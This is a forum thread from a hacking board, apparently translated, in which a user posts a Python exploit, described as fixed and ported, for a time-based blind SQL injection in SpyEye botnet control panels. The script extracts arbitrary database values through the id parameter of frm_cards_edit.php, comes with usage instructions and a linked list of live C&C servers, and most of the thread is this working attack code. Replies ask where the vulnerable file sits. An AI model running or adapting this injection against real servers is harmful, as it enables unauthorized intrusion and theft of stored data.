0-day for hijacking SpyEye botnets, who has figured it out?

Discussion in 'Vulnerabilities' started by FlatL1ne, 19 Sep 2011.

  1. FlatL1ne (Elder; joined 5 Oct 2007; 96 messages; 27 likes; reputation 10)

    C&C list: https://spyeyetracker.abuse.ch/monitor.php


    Code:
        #!/usr/bin/env python3
        # SpyEye r0073r xpl01t, ported to Python 3. Two defects of the posted
        # version are fixed: the SUBSTRING position counter was reset to 0 on
        # every request (so only position 0 was ever tested), and the charset
        # stopped one short of 'z'.

        from http.client import HTTPConnection
        from time import time
        from sys import exit, argv, stdout
        from urllib.parse import urlencode

        print("""
        1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
        0             __      __   __                   __                           1
        1           /'__`\ /'__`\/\ \__              /'__`\                        0
        0     _ __ /\ \/\ \/\ \/\ \ \ ,_\ __  __  __/\ \/\ \ _ __    ___ ___       1
        1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\    0
        0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \   1
        1     \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\  0
        0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
        1                                                                            0
        0                                                                            1
        1                                       >> SpyEye r0073r xpl01t              0
        0                                       >> author : Sanjar Satsura           1
        1                                       >> sanjar[at]xakep[dot]ru            0
        0                                       >> Public v.0.1                      1
        1                                       >> )c(  2011                         0
        0                                                                            1
        1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0

         Example:
         Spyeye_r0073r <host> /dir/ "version()"

        """)

        if len(argv) <= 3:
            exit("usage: %s <host> </dir/> <sql expression>" % argv[0])
        print("[+]Started pwn...")

        host = argv[1]
        path = argv[2]   # directory of the SpyEye panel, with trailing slash
        sql = argv[3]    # sub-select / expression whose result is read byte by byte
        port = 80

        extracted = ""

        # Charset to try: ASCII 48..122 ('0'-'9', some punctuation, 'A'-'Z', 'a'-'z').
        # The trailing 0 means "no candidate matched", i.e. the end of the value.
        full = list(range(48, 123)) + [0]

        delay = 0.5   # seconds; slower than this means IF() took the BENCHMARK branch
        a = 1         # 1-based position in the value (MySQL SUBSTRING is 1-based)
        while a <= 32:
            for i in full:
                if i == 0:
                    exit("\n[+]Finished: " + extracted + "\n")
                start = time()   # start time for the delay measurement
                conn = HTTPConnection(host, port)
                # Time-based blind injection through the id parameter: BENCHMARK runs
                # only when byte `a` of the result has ASCII code `i`.
                values = {"id": "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + "),"
                                + str(a) + ",1)),0)=" + str(i)
                                + "),BENCHMARK(9000000,SHA1(1)),1));-- /*"}
                data = urlencode(values)
                conn.request("GET", path + "frm_cards_edit.php?" + data)
                response = conn.getresponse()
                response.read()
                conn.close()
                if response.status == 404:
                    exit("[+]404")
                if time() - start > delay:
                    # slow response: the comparison held, this is the character
                    stdout.write(chr(i))
                    stdout.flush()
                    extracted += chr(i)
                    a += 1
                    break

        # w4tch u. h4ck u. fuck u. 1337day
        # www.r00tw0rm.com
    
     
  2. Bukvo_Ezka (Banned; joined 8 Sep 2011; 12 messages; 0 likes; reputation 0)

    So what exactly isn't working?
     
  3. Koren (Member; joined 11 Jul 2009; 102 messages; 20 likes; reputation 1)

    Come on, what injection is there? )
     
  4. Bukvo_Ezka (Banned; joined 8 Sep 2011; 12 messages; 0 likes; reputation 0)

    Figured it out, figured it out )))
     
  5. vaddd (Member; joined 6 Jan 2009; 178 messages; 18 likes; reputation 9)

    frm_cards_edit.php

    For some reason it returns a 404 error on every admin panel...
    Which directory does this file live in?
     